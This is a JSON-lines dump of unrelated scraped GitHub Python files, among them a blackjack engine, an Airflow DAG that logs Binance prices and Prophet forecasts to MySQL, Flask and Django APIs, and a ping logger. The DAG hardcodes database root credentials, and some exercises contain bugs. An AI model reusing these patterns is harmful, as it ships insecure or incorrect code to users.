py_version)\n    rval = run('git', '-C', 'python/', 'checkout', py_version)[0]\n    if rval != 0:\n        print(\"Checkout failed!\")\n        sys.exit(2)\n\n    print(\"Checking NDK\")\n    if check_ndk(ndk_dir, ndk_min_ver) != 0:\n        print(\"NDK not found. 
Please install NDK version %s or later and specify --ndk-dir\" % ('.'.join(str(v) for v in ndk_min_ver)))\n        sys.exit(1)\n\n    print(\"Setting up build environment\")\n    if trymkdir('build') != 0:\n        sys.exit(1)\n    with open('build/config.site', 'w') as f:\n        f.write('ac_cv_file__dev_ptmx=no\\n')\n        f.write('ac_cv_file__dev_ptc=no\\n')\n\n    arguments=[shell, '../python/configure']\n\n    toolchain = ndk_dir + '/toolchains/llvm/prebuilt/linux-x86_64'\n    arguments.append('--srcdir=../python')\n    arguments.append('--prefix=' + os.path.realpath('out/'))\n    arguments.append('--build=x86_64-pc-linux-gnu')\n    arguments.append('--host=' + target)\n    arguments.append('--disable-ipv6')\n    arguments.append('CONFIG_SITE=config.site')\n    arguments.append('TOOLCHAIN=' + toolchain)\n    arguments.append('TARGET=' + target)\n    arguments.append('API=' + android_ver)\n    arguments.append('AR=' + toolchain + '/bin/llvm-ar')\n    arguments.append('CC=' + toolchain + '/bin/' + target + android_ver + '-clang')\n    arguments.append('AS=' + toolchain + '/bin/' + target + android_ver + '-clang')\n    arguments.append('CXX=' + toolchain + '/bin/' + target + android_ver + '-clang++')\n    arguments.append('LD=' + toolchain + '/bin/ld')\n    arguments.append('RANLIB=' + toolchain + '/bin/llvm-ranlib')\n    arguments.append('STRIP=' + toolchain + '/bin/llvm-strip')\n    arguments.append('READELF=' + toolchain + '/bin/llvm-readelf')\n    arguments.append('LD_LIBRARY_PATH=' + toolchain + '/sysroot/usr/lib/' + target + \\\n        ':' + toolchain + '/sysroot/usr/lib/' + target + '/' + android_ver)\n\n    if not os.path.exists('out/bin') or force_build:\n        rval = run(*arguments, cwd='build/')[0]\n        if rval != 0:\n            print(\"configure failed (%d)\" % rval)\n            sys.exit(2)\n\n        rval = run(make, 'clean', cwd='build/')[0]\n        if rval != 0:\n            print(\"clean failed (%d)\" % rval)\n            sys.exit(2)\n\n        rval = run(make, '-j' + str(make_jobs), cwd='build/')[0]\n        if rval != 0:\n            print(\"compilation failed (%d)\" % rval)\n            sys.exit(2)\n\n        rval = run(make, 'install', cwd='build/')[0]\n        if rval != 0:\n            print(\"install failed (%d)\" % rval)\n            sys.exit(2)\n\n    pyver_numbers = py_version[1:].split('.')\n    python_executable = 'python' + '.'.join(pyver_numbers[0:2])\n\n    print(\"Building install archive\")\n    if trymkdir('install') != 0:\n        sys.exit(2)\n    if os.path.exists('install'):\n        for fname in os.listdir('install'):\n            os.remove('install/' + fname)\n\n    copy('out/bin/' + python_executable, 'install/' + python_executable)\n    install_archive = 'install/' + python_executable + '.tar.gz'\n    if os.path.exists(install_archive):\n        os.remove(install_archive)\n    run(tar, '-C', 'out/lib', '-cvzf', install_archive, 'python3.9/')\n\n    build_time = time.localtime()\n\n    install_info = {\n        'version': py_version[1:],\n        'python': python_executable,\n        'build-tool-version': '1.0.0',\n        'build-date': time.strftime('%Y-%m-%d %H:%M', build_time)\n    }\n\n    with open('install/install-info.txt', 'w') as f:\n        json.dump(install_info, f)\n\n    # copy install scripts\n    copy('install-tools/install.py', 'install/install.py')\n    copy('install-tools/install-setup.sh', 'install/install-setup.sh')\n    copy('install-tools/README.txt', 'install/README.txt')\n    copy('LICENSE', 'install/LICENSE.txt')\n\n    print()\n    print(\"Creating zip archive...\")\n    output_name = 'android-python-%s-%s' % (py_version, time.strftime('%Y%m%d_%H%M', build_time))\n    shutil.make_archive(output_name, 'zip', 'install')\n    print(\"Done! 
(%.3f s)\" % (time.perf_counter() - start_time))\n print()\n\nif __name__ == '__main__':\n main()\n","repo_name":"cdbbnnyCode/android-python","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":6935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18736227522","text":"import json \n\nwith open('json/data.json', 'r') as f:\n data = json.loads(f.read()) \n\ndef sort_dict(data):\n data = dict(sorted(data.items(), key=lambda x: x[1]['slno']))\n\n for key, value in data.items():\n value['videos'] = dict(sorted(value['videos'].items(), key=lambda x: x[1]['slno']))\n \n return data \n\nwith open('x.json', 'w') as f:\n f.write(json.dumps(sort_dict(data)))","repo_name":"rittwickBhabak/online-courses","sub_path":"utils/sort.py","file_name":"sort.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22545910366","text":"\"\"\"\r\nProblem 2: Add Two Numbers. \r\n\r\nAPAS' description of problem: \r\n\r\n\t\"You are given two non-empty linked lists representing two non-negative integers.\r\n\t The digits are stored in reverse order and each of their nodes contain a single digit.\r\n\t Add the two numbers and return it as a linked list. \r\n\t You may assume the two numbers do not contain any leading zero, except the number 0 itself.\"\r\n\r\n\"\"\"\r\n# Creating linked list\r\nclass Node: \r\n\tdef __init__(self, dataval=None): \r\n\t\tself.dataval = dataval \r\n\t\tself.nextval = None \r\n\r\nclass SLinkedList: \r\n\tdef __init__(self, dataval=None): \r\n\t\tself.headval = None \r\n\r\n# First linked list\r\nlist1 = SLinkedList() \r\nlist1.headval = Node(2)\r\ne2 = Node(4)\r\ne3 = Node(3)\r\nlist1.headval.nextval = e2 # Connecting first node to second \r\ne2.nextval = e3 # Connecting second node to third\r\n\r\n# Second linked list\r\nlist2 = SLinkedList() \r\nlist2.headval = Node(5)\r\nf2 = Node(6)\r\nf3 = Node(4)\r\nlist1.headval.nextval = f2 \r\nf2.nextval = f3 \r\n\r\n# Adding the respective numbers and reversing the order.\r\ng1 = list1.headval.dataval + list2.headval.dataval \r\ng2 = e2.dataval + f2.dataval \r\ng3 = e3.dataval + f3.dataval \r\n\r\n# When digit is ten or above, add to the higher order.\r\nif g1 >= 10: \r\n\tg1 = str(g1)\r\n\tg2 += int(g1[0]) \r\n\tif g1 == 0 or g1 == None:\r\n\t\tg1 = 0 \r\n\telse: \r\n\t\tg1 = int(g1[1])\r\nif g2 >= 10: \r\n\tg2 = str(g2)\r\n\tg3 += int(g2[0]) \r\n\tif g2 == 0 or g2 == None:\r\n\t\tg2 = 0 \r\n\telse: \r\n\t\tg2 = int(g2[1])\r\n\r\n# Setting up solution in a new linked list. 
\t\r\nlist_solution = SLinkedList() \r\nlist_solution.headval = Node(g3) \r\ni2 = Node(g2)\r\ni3 = Node(g1) \r\nlist_solution.headval.nextval = i2 \r\ni2.nextval = i3\r\n\t\r\noutput = str(list_solution.headval.dataval) + \" \" + str(i2.dataval) + \" \" + str(i3.dataval)\r\n\r\nprint (output)\r\n","repo_name":"MisesRevived/APAS","sub_path":"addtwonumbers.py","file_name":"addtwonumbers.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28304850669","text":"import threading\n\nONGOING = 0\nPLAYER_WIN = 1\nPLAYER_LOSE = 2\nPLAYER_BUST = 3\nHOUSE_BUST = 4\nDRAW = 5\nPLAYER_DONE = 6\n\nHIT = 11\nHOLD = 12\nDOUBLE = 13\nSPLIT = 14\n\nHOUSE = 'HOUSE'\nPLAYER = 'PLAYER'\n\nINVALID_BET = 'Invalid Bet'\nINSUFFICIENT_CREDITS = 'Insufficient Credits'\nINVALID_DOUBLE = 'Cannot Double Down'\nINVALID_SPLIT = 'Cannot Split'\n\nTHRESHOLD = 17\n\n\nclass BlackjackException(Exception):\n pass\n\n\nclass InvalidBetException(BlackjackException):\n pass\n\n\nclass InsufficientCreditsException(BlackjackException):\n pass\n\n\nclass InvalidDoubleStateException(BlackjackException):\n pass\n\n\nclass InvalidSplitStateException(BlackjackException):\n pass\n\n\nclass Blackjack():\n def __init__(self, credits, deck, bet, house_user, player_user):\n if credits.get_user_creds(player_user) < bet:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS)\n\n bet_test = bet / 2 * 3\n if bet <= 0 or (bet_test - int(bet_test) != 0):\n raise InvalidBetException(INVALID_BET)\n\n self.credits = credits\n self.lock = threading.Lock()\n self.bets = [bet]\n self.doubled = [False]\n self.curr_hand = 0\n self.deck = deck\n self.deck.lock.acquire()\n self.house_cards = [self.deck.draw(), self.deck.draw(1)]\n self.player_cards = [[self.deck.draw(), self.deck.draw()]]\n self.deck.lock.release()\n self.turn = PLAYER\n self.states = [ONGOING]\n self.net = -bet\n\n self.house_user = house_user\n self.player_user = player_user\n\n self.credits.transfer_from_to(player_user, house_user, bet)\n\n self._determine_state()\n\n def calc_32(self, bet):\n payout = int(bet / 2 * 3)\n if payout % 2 == 0:\n return payout\n return payout + 1\n\n def get_states(self):\n return self.states\n\n def get_curr_state(self):\n if self.curr_hand == len(self.states):\n return PLAYER_DONE\n return self.states[self.curr_hand]\n\n def set_state(self, state, index):\n if state in [ONGOING, PLAYER_WIN, PLAYER_LOSE,\n PLAYER_BUST, HOUSE_BUST, DRAW]:\n self.states[index] = state\n\n def set_curr_state(self, state):\n self.set_state(state, self.curr_hand)\n\n def _determine_state(self):\n curr_state = self.get_curr_state()\n house_sum = best_sum(self.house_cards)\n if curr_state == ONGOING:\n curr_bet = self.bets[self.curr_hand]\n curr_player_hand = self.player_cards[self.curr_hand]\n player_sum = best_sum(curr_player_hand)\n num_player_cards = len(curr_player_hand)\n\n # Beginning State, 2 cards both sides\n # if num_house_cards == num_player_cards == 2:\n if num_player_cards == 2:\n # Handle auto win when house or player dealt 21\n if house_sum == player_sum == 21 or player_sum == 21:\n self.set_curr_state(PLAYER_WIN)\n elif house_sum == 21:\n self.set_curr_state(PLAYER_LOSE)\n else:\n return\n self.curr_hand += 1\n self._determine_state()\n # Player Turn\n elif self.turn == PLAYER:\n if player_sum > 21:\n self.set_curr_state(PLAYER_BUST)\n # When player busts, Move to next hand\n self.curr_hand += 1\n # If all player hands are done\n if self.curr_hand == 
len(self.player_cards):\n # Change turn to house\n self.turn = HOUSE\n # If player split, make house hit to have a hand to compare\n if len(self.player_cards) > 1:\n self.hit()\n # If player not split, continue/end game\n else:\n self._determine_state()\n # If not all player hands done, continue player turn\n else:\n self._determine_state()\n elif curr_state == PLAYER_DONE:\n # House Turn\n for i in range(len(self.player_cards)):\n curr_bet = self.bets[i]\n curr_player_sum = best_sum(self.player_cards[i])\n if self.states[i] == ONGOING:\n if curr_player_sum > 21 and house_sum > 21:\n self.set_state(DRAW, i)\n elif curr_player_sum > 21:\n self.set_state(PLAYER_BUST, i)\n elif house_sum > 21:\n self.set_state(HOUSE_BUST, i)\n elif house_sum > curr_player_sum:\n self.set_state(PLAYER_LOSE, i)\n elif house_sum < curr_player_sum:\n self.set_state(PLAYER_WIN, i)\n elif house_sum == curr_player_sum:\n self.set_state(DRAW, i)\n\n if self.states[i] in [HOUSE_BUST, PLAYER_WIN]:\n is_two = len(self.player_cards[i]) == 2\n is_blackjack = house_sum == curr_player_sum == 21 or curr_player_sum == 21\n if self.states[i] == PLAYER_WIN and is_two and is_blackjack:\n # Bet Payout 3:2\n self.net += curr_bet + self.calc_32(curr_bet)\n else:\n self.net += curr_bet + curr_bet\n elif self.states[i] == DRAW:\n self.net += curr_bet\n # End of Game, distribute winnings\n self.credits.transfer_from_to(self.house_user, self.player_user, self.net + sum(self.bets))\n\n def hit(self):\n self.deck.lock.acquire()\n if self.turn == HOUSE:\n house_sum = best_sum(self.house_cards)\n while house_sum < THRESHOLD:\n self.house_cards += [self.deck.draw()]\n house_sum = best_sum(self.house_cards)\n elif self.turn == PLAYER:\n self.player_cards[self.curr_hand] += [self.deck.draw()]\n self.deck.lock.release()\n self._determine_state()\n\n def hold(self):\n self.curr_hand += 1\n if self.curr_hand == len(self.player_cards):\n self.turn = HOUSE\n self.hit()\n else:\n self._determine_state()\n\n def double(self):\n if self.turn != PLAYER:\n return\n curr_index = self.curr_hand\n if not self.doubled[curr_index] and len(self.player_cards[curr_index]) == 2:\n player_creds = self.credits.get_user_creds(self.player_user)\n if player_creds >= self.bets[curr_index]:\n self.credits.transfer_from_to(self.player_user, self.house_user, self.bets[curr_index])\n self.net -= self.bets[curr_index]\n self.doubled[curr_index] = True\n self.bets[curr_index] *= 2\n self.hit()\n if self.states[curr_index] == ONGOING:\n self.hold()\n else:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS + ' to Double Down')\n else:\n raise InvalidDoubleStateException(INVALID_DOUBLE)\n\n def split(self):\n if self.turn != PLAYER:\n return\n curr_cards = self.player_cards[self.curr_hand]\n if len(curr_cards) == 2 and curr_cards[0] == curr_cards[1]:\n user_creds = self.credits.get_user_creds(self.player_user)\n curr_bet = self.bets[self.curr_hand]\n if user_creds >= curr_bet:\n self.deck.lock.acquire()\n self.player_cards[self.curr_hand] = [curr_cards[0], self.deck.draw()]\n self.player_cards += [[curr_cards[1], self.deck.draw()]]\n self.deck.lock.release()\n\n self.bets += [self.bets[self.curr_hand]]\n self.doubled += [False]\n self.states += [ONGOING]\n\n self.credits.transfer_from_to(self.player_user, self.house_user, self.bets[self.curr_hand])\n self.net -= self.bets[self.curr_hand]\n\n self._determine_state()\n else:\n raise InsufficientCreditsException(INSUFFICIENT_CREDITS + ' to Split')\n else:\n raise InvalidSplitStateException(INVALID_SPLIT)\n\n\ndef 
calc_sums(cards):\n    nums = []\n    num_aces = 0\n    for c in cards:\n        if c != 'Ace':\n            if c in ['Jack', 'Queen', 'King']:\n                nums += [10]\n            else:\n                nums += [int(c)]\n        else:\n            num_aces += 1\n    base_sum = sum(nums)\n    low_sum = base_sum\n    high_sum = base_sum\n    for _ in range(num_aces):\n        low_sum += 1\n    for _ in range(num_aces):\n        if high_sum <= 10:\n            high_sum += 11\n        else:\n            high_sum += 1\n    if low_sum == high_sum:\n        return (low_sum,)\n    return (low_sum, high_sum)\n\n\ndef best_sum(cards):\n    sums = calc_sums(cards)\n    if len(sums) > 1 and sums[1] <= 21:\n        return sums[1]\n    return sums[0]\n","repo_name":"Barkuto/eschamali","sub_path":"cogs/gamez/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":9129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}\n+{"seq_id":"17317739343","text":"from airflow import DAG\nimport pendulum\nimport datetime\nfrom airflow.operators.python import PythonOperator\nimport random\n\nwith DAG(\n    dag_id=\"get_binance02\", # DAG id\n    schedule_interval=\"@hourly\", # run every hour\n    start_date=pendulum.datetime(2023, 10, 4, tz=\"Asia/Seoul\"), # start running on October 4, 2023\n    catchup=False\n) as dag:\n\n    def get_bitcoin():\n        import requests\n        from datetime import datetime,timezone, timedelta\n        import time\n        import pytz\n        import pymysql\n        \n        \n        # Get the current date and time (UTC), e.g. 2023-09-27 09:18:24:000\n        now = datetime.now()\n        print(\"now =\",str(now))\n\n        # Keep the first 16 characters of 2023-09-27 09:18:24:000 -> 2023-09-27 09:18 (minute precision)\n        end_date_time = str(now)[:16]\n        print(\"end_date_time=\",end_date_time)\n\n        # The date and time one hour earlier, e.g. 2023-09-27 08:18:24:000\n        one_hour_ago = (now - timedelta(hours=1))\n        print(\"one_hour_ago=\",str(one_hour_ago))\n\n        # First 16 characters of the time one hour earlier -> 2023-09-27 08:18\n        start_date_time = str(one_hour_ago)[0:16]\n        print(\"start_date_time=\",start_date_time)\n\n\n        # Binance API endpoint for fetching candlestick (kline) data\n        URL = 'https://api.binance.com/api/v3/klines'\n        # Symbol: BTCUSDT (Bitcoin), ETHUSDT (Ethereum)\n        coin_name = \"BTCUSDT\"\n        \n\n\n        # Parse the end_date_time string into a datetime (1-second resolution),\n        # convert it to an integer epoch timestamp, then multiply by 1000\n        # to express it in milliseconds (1 second -> 1000).\n        end = int(time.mktime(datetime.strptime(end_date_time , '%Y-%m-%d %H:%M').timetuple())) * 1000\n        print(\"end=\",end)\n        \n        # Same conversion for start_date_time: datetime -> integer epoch seconds -> milliseconds.\n        start = int(time.mktime(datetime.strptime(start_date_time , '%Y-%m-%d %H:%M').timetuple())) * 1000\n        print(\"start=\",start)\n        \n        # Binance API parameters\n        params = {\n            'symbol': coin_name, # symbol: BTCUSDT (Bitcoin), ETHUSDT (Ethereum)\n            'interval': '1m', # sampling interval: 1m (1 minute), 1h (1 hour)\n            'limit': 1000, # number of rows to fetch per request\n            'startTime': start, # start time\n            'endTime': end # end time\n        }\n        \n        # Connect to the database\n        db = pymysql.connect(\n            host='192.168.0.171' # IP address of the machine running MySQL\n            ,port=3306\n            ,user='root'\n            ,passwd='1234'\n            ,db='coin_db'\n            ,charset='utf8'\n        )\n        \n        # Cursor object used to execute database queries\n        cursor=db.cursor()\n        \n        # Repeat while start is earlier than end\n        while start < end:\n            print(\"start=\",start//1000)\n            # Refresh the start time in the Binance parameters\n            params['startTime'] = start\n            # Call the Binance API; the response (Bitcoin prices) is stored in result\n            result = requests.get(URL, params = params)\n            # Store the result (up to 1000 candles) in coin_list\n            coin_list = result.json()\n            #print(\"coin_list=\",coin_list)\n            if not coin_list: # if coin_list is empty\n                break # stop the loop\n\n
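            # For reference (added): each kline in the Binance response is an array of\n            # the form [open_time_ms, open, high, low, close, volume, close_time_ms, ...],\n            # which is why indices coin[0]..coin[5] are used below.\n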
            # Process one candle from coin_list at a time\n            for coin in coin_list:\n                # Timezone object used to convert UTC to Seoul time\n                timezone = pytz.timezone('Asia/Seoul')\n\n                # coin[0]: the candle's date and time stored as an integer in\n                # milliseconds (1 second -> 1000), so divide by 1000 to get seconds,\n                # convert to a datetime with datetime.fromtimestamp,\n                # and pass tz=timezone to convert it to Seoul time.\n                open_time = datetime.fromtimestamp(coin[0] //1000, tz=timezone)\n                print(\"open_time=\",open_time) # candle date and time\n                open_price = coin[1] # open price\n                print(\"open_price=\",open_price)\n                high_price = coin[2] # high price\n                print(\"high_price=\",high_price)\n                low_price = coin[3] # low price\n                print(\"low_price=\",low_price)\n                close_price = coin[4] # close price\n                print(\"close_price=\",close_price)\n                volume = coin[5] # trading volume\n                print(\"volume=\", volume)\n                print(\"=\"*100)\n                \n                # Query that counts rows whose open_time matches this candle\n                count_sql = \"select count(*) from coin where open_time=%s\"\n                cursor.execute(count_sql,(open_time,))\n                \n                # Store the query result\n                count = cursor.fetchall()[0][0]\n                print(\"count : \", count)\n                \n                if count < 1: # no row exists for this timestamp yet\n                    insert_sql = \"insert into coin (open_time, open_price, high_price, low_price, close_price, volume, symbol) \"\n                    insert_sql +=\" values(%s, %s, %s, %s, %s, %s, %s);\" \n                    \n                    cursor.execute(insert_sql, (open_time,open_price, high_price, low_price, close_price, volume, coin_name))\n                    db.commit()\n                \n                else: # a row for this timestamp already exists\n                    update_sql = \"update coin set open_price=%s, high_price=%s, low_price=%s, close_price=%s, volume=%s, symbol=%s where open_time=%s;\"\n                    \n                    cursor.execute(update_sql, (open_price, high_price, low_price, close_price, volume, coin_name ,open_time))\n                    db.commit()\n                \n            # coin_list[-1][0]: column 0 of the last row (-1) of the list, i.e. the last\n            # collected timestamp, stored as an int in milliseconds.\n            # Add 60000 (60 seconds) and use the result as the next start time.\n            start = coin_list[-1][0] + 60000 # move on to the next step\n            #print(\"coin_list[-1][0] + 60000 =\",coin_list[-1][0] + 60000)\n            #print(\"start=\",start)\n            time.sleep(1)\n        \n        db.close()\n\n    py_t1 = PythonOperator(\n        task_id='py_t1004_01', # id of the task to run\n        python_callable=get_bitcoin # function to run\n    )\n\n    # Store predicted Bitcoin prices in the DB\n    def get_predict():\n        import pymysql\n        from prophet import Prophet\n        import pandas as pd\n        \n        # Connect to the database\n        db = pymysql.connect(\n            host='192.168.0.171' # IP address of the machine running MySQL\n            ,port=3306\n            ,user='root'\n            ,passwd='1234'\n            ,db='coin_db'\n            ,charset='utf8'\n        )\n        \n        # Cursor object used to execute database queries\n        cursor=db.cursor()\n        \n        # Keep the 14400 most recent rows:\n        # one day produces 60*24 = 1440 rows,\n        # so 10 days -> 14400 rows.\n        # Query 10 days of Bitcoin prices.\n        \n        # Sort by date ASC (oldest data -> most recent data)\n        sql = \"SELECT c.* FROM (SELECT open_time AS ds, close_price AS y FROM coin \" \n        sql += \"ORDER BY open_time DESC limit 14400) AS c ORDER BY c.ds ASC ;\"\n        \n        # Store the query result in a DataFrame\n        bitcoin_df = pd.read_sql(sql, db)\n        \n        # Prophet's input data columns must be named 'ds' and 'y'.\n        ## seasonality_mode: how yearly, monthly, weekly and daily trends are combined\n        ### changepoint_prior_scale: how strongly trend changes are reflected in the\n        ### forecast; the higher the value, the more closely the trend is followed.\n        ### For Bitcoin data it works well to reflect the trend at most periodicities.\n        prophet = Prophet(\n            seasonality_mode='multiplicative', # reflect trends\n            yearly_seasonality=True, # yearly trend\n            weekly_seasonality=True, # weekly trend\n            daily_seasonality=True, # daily trend\n            changepoint_prior_scale=0.5 # trend sensitivity\n        )\n        \n        # Fit to the existing data before forecasting\n        prophet.fit(bitcoin_df)\n\n        # Configure a forecast of 60 one-minute steps (60 minutes)\n        future_data = prophet.make_future_dataframe(periods=60, freq='min')\n        \n        # Predict Bitcoin prices\n        forecast_data = prophet.predict(future_data) \n\n        # Number of rows in future_data\n        df_count = len(future_data)\n        \n
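        # For reference (added): prophet.predict returns a DataFrame whose columns\n        # include 'ds', 'yhat', 'yhat_lower' and 'yhat_upper'; only the point\n        # forecast 'yhat' is persisted below.\n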
: \", predict_price)\n \n # open_time과 일치하는 시간의 레코드 개수 조회 쿼리\n count_sql = \"SELECT COUNT(*) FROM coin WHERE open_time=%s ;\"\n cursor.execute(count_sql, open_time)\n \n count= cursor.fetchall()[0][0]\n \n if count >= 1: # 존재하는 값이라면\n # 예측값이 null 인 데이터 수 조회\n predict_count_sql = \"SELECT COUNT(*) FROM coin WHERE open_time=%s AND predic_price IS NULL ;\"\n cursor.execute(predict_count_sql, open_time)\n predict_count = cursor.fetchall()[0][0]\n print(\"예측 값 수 : \", predict_count)\n \n if predict_count >= 1 : # 예측값이 null 인 값이 1개 이상 존재\n # coin 테이블에 예측값을 넣는 쿼리, 기존 null 값, update 사용\n update_sql = 'update coin set predic_price=%s where open_time=%s;'\n\n cursor.execute(update_sql,(predict_price, open_time))\n db.commit()\n \n else: # 없는 데이터라면\n insert_sql = \"insert into coin (open_time, predic_price) values(%s, %s)\"\n cursor.execute(insert_sql,(open_time, predict_price))\n db.commit()\n \n print(\"=\"*100)\n\n db.close()\n \n py_t2 = PythonOperator(\n task_id='py_t1004_02', #실행할 task id\n python_callable=get_predict #실행 할 함수\n )\n \n # py_t1 실행 후 py_t2\n py_t1 >> py_t2","repo_name":"aaingyunii/Bootcamp_BigData","sub_path":"bigdata_system/airflow/get_binance02.py","file_name":"get_binance02.py","file_ext":"py","file_size_in_byte":11352,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36333481218","text":"import os\nfrom datetime import datetime, timedelta, timezone\nimport subprocess\nimport random\nimport sched\nimport time\nimport csv\n\ndef Ping(host, size):\n\n command = ['ping', '-s', str(size), '-c', '1', host]\n\n process = subprocess.run(command, stdout=subprocess.PIPE)\n text = process.stdout.decode('UTF-8')\n\n print(text)\n return text\n\n\ndef Parse(text):\n\n # 100%パケットロスだったらNoneを返す\n if '100% packet loss' in text:\n return None\n\n rtt = [line for line in text.split('\\n')][-2].split(' ')[-2].split('/')[1]\n\n return rtt\n\n\ndef Size(size_max):\n\n size = size_max\n while size >= size_max:\n size = random.expovariate(0.5)\n \n return int(size * 1024)\n\n\ndef Record(host, size, rtt):\n\n #jst = timezone(timedelta(hours=+9), 'JST')\n now = datetime.now().isoformat()\n\n directory = 'data/{}/{}.csv'.format(host, now.split('T')[0])\n\n if not os.path.exists('./data/{}'.format(host)):\n os.makedirs('data/' + host)\n\n if not os.path.exists(directory):\n rows = [\n ['datetime','size','rtt'],\n [now, size, rtt]\n ]\n else:\n rows = [\n [now, size, rtt]\n ]\n\n with open(directory, mode='a', newline='') as f:\n writer = csv.writer(f)\n writer.writerows(rows)\n\ndef Main():\n\n global host\n global size\n text = Ping(host, size)\n rtt = Parse(text)\n Record(host, size, rtt)\n\n\nhost = '10.254.30.254'\n\ns = sched.scheduler(time.time, time.sleep)\n\nwhile True:\n size = int(random.uniform(1, 60) * 1024)\n s.enter(60, 1, Main)\n s.run()\n","repo_name":"Sevewell/measurenet","sub_path":"measure/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33917990280","text":"from flask import Flask, request\nfrom flask_restful import Api, Resource, reqparse, abort\n\napp = Flask(__name__)\napi = Api(app)\n\ndata = {}\n\nvideo_post_args = reqparse.RequestParser()\n\nvideo_post_args.add_argument(\"name\", type=str, help=\"Enter name of video\", required=True)\nvideo_post_args.add_argument(\"likes\", type=int, help=\"Enter video likes\", required=True)\nvideo_post_args.add_argument(\"views\", type=int, 
help=\"Enter video views\", required=True)\n\ndef abort_id_not_found(param):\n if param not in data:\n abort(404, message = \"video ID not available\")\n\ndef abort_id_already_present(param):\n if param in data:\n abort(404, message = f\"video data already created for the id {param}\")\n\nclass Video(Resource):\n def get(self):\n param = request.args.get('id')\n abort_id_not_found(param)\n return data[param]\n \n def post(self):\n param = request.args.get('id')\n abort_id_already_present(param)\n args = video_post_args.parse_args()\n data[param] = args\n print(args)\n \n def delete(self):\n param = request.args.get('id')\n abort_id_not_found(param)\n \n\napi.add_resource(Video, \"/video/\")\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"jaglinux/python-projects","sub_path":"restAPI/main_2.py","file_name":"main_2.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32914165822","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse, HttpResponseNotFound\nfrom django_mako_plus import view_function\nimport json\nfrom .. import dmp_render, dmp_render_to_string\nfrom catalog import models as cmod\nfrom django import forms\nfrom formlib.form import FormMixIn\n\n@view_function\ndef process_request(request):\n # Create a list to hold the dictionaries\n dlist = []\n\n try:\n urlProduct = request.GET.get('product')\n urlCategory = request.GET.get('category')\n urlMin = request.GET.get('min-price')\n urlMax = request.GET.get('max-price')\n\n # grab all the products to begin with\n qry = cmod.Product.objects.all()\n\n\n # then filter them according to the url parameters\n if urlProduct is not None:\n qry = qry.filter(name__icontains=urlProduct)\n if urlCategory is not None:\n qry = qry.filter(category__name__icontains=urlCategory)\n if urlMin is not None:\n qry = qry.filter(price__gte=urlMin)\n if urlMax is not None:\n qry = qry.filter(price__lte=urlMax)\n\n\n\n\n # grab all products based on the above filters\n print('>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>')\n for p in qry:\n # Create the dictionary itself, this variable will change throughout the loop\n d = {}\n d['name'] = p.name\n d['category'] = p.category.name\n d['price'] = p.price\n if hasattr(p, 'quantity'):\n d['quantity'] = p.quantity\n if hasattr(p, 'reorder_trigger'):\n d['reorder-trigger'] = p.reorder_trigger\n if hasattr(p, 'reorder_quantity'):\n d['reorder_quantity'] = p.reorder_quantity\n if hasattr(p, 'serial_number'):\n d['serial_number'] = p.serial_number\n dlist.append(d)\n except:\n #return HttpResponseNotFound('Invalid Details')\n dlist = [{'Error in the api call'}]\n\n print('------- d list: ', dlist)\n\n [ { 'error': '...' 
}, ]\n\n # return HttpResponse(json.dumps(ret), content_type='application/json')\n return JsonResponse(dlist, safe=False)\n #wrap a list into a dictionary and return that \n","repo_name":"Akokixav/Sprint_3","sub_path":"fomo/api/views/products.py","file_name":"products.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36088048315","text":"from __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport time\n\nimport torch\nfrom spatial_correlation_sampler import SpatialCorrelationSampler\nfrom tqdm import trange\n\nTIME_SCALES = {'s': 1, 'ms': 1000, 'us': 1000000}\n\nparser = argparse.ArgumentParser()\nparser.add_argument('backend', choices=['cpu', 'cuda'], default='cuda')\nparser.add_argument('-b', '--batch-size', type=int, default=16)\nparser.add_argument('-k', '--kernel-size', type=int, default=3)\nparser.add_argument('--patch', type=int, default=3)\nparser.add_argument('--patch_dilation', type=int, default=2)\nparser.add_argument('-c', '--channel', type=int, default=64)\nparser.add_argument('--height', type=int, default=100)\nparser.add_argument('-w', '--width', type=int, default=100)\nparser.add_argument('-s', '--stride', type=int, default=2)\nparser.add_argument('-p', '--pad', type=int, default=1)\nparser.add_argument('--scale', choices=['s', 'ms', 'us'], default='us')\nparser.add_argument('-r', '--runs', type=int, default=100)\nparser.add_argument('--dilation', type=int, default=2)\nparser.add_argument('-d', '--dtype', choices=['half', 'float', 'double'])\n\nargs = parser.parse_args()\n\ndevice = torch.device(args.backend)\n\nif args.dtype == 'half':\n dtype = torch.float16\nelif args.dtype == 'float':\n dtype = torch.float32\nelse:\n dtype = torch.float64\n\n\ninput1 = torch.randn(args.batch_size,\n args.channel,\n args.height,\n args.width,\n dtype=dtype,\n device=device,\n requires_grad=True)\ninput2 = torch.randn_like(input1)\n\ncorrelation_sampler = SpatialCorrelationSampler(\n args.kernel_size,\n args.patch,\n args.stride,\n args.pad,\n args.dilation,\n args.patch_dilation)\n\n# Force CUDA initialization\noutput = correlation_sampler(input1, input2)\nprint(output.size())\noutput.mean().backward()\nforward_min = float('inf')\nforward_time = 0\nbackward_min = float('inf')\nbackward_time = 0\nfor _ in trange(args.runs):\n correlation_sampler.zero_grad()\n\n start = time.time()\n output = correlation_sampler(input1, 